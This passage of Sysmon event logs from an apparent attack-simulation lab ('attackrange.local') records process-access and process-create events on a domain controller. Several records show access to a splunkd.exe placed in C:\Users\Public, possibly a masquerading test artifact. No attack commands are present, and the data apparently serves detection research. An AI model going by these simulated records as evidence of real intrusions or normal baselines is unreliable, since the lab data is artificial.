06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10EC-5F25-0000-0010AF3F0500}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10EC-5F25-0000-0010AF3F0500}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:25.380\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:25.380","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.382\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.382","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.414\r\nProcessGuid: {E2A3D6B1-10EE-5F25-0000-001047420500}\r\nProcessId: 4536\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.414","ProcessGuid":"{E2A3D6B1-10EE-5F25-0000-001047420500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10EE-5F25-0000-001047420500}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10EE-5F25-0000-001047420500}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10EE-5F25-0000-001047420500}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10EE-5F25-0000-001047420500}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.413\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: 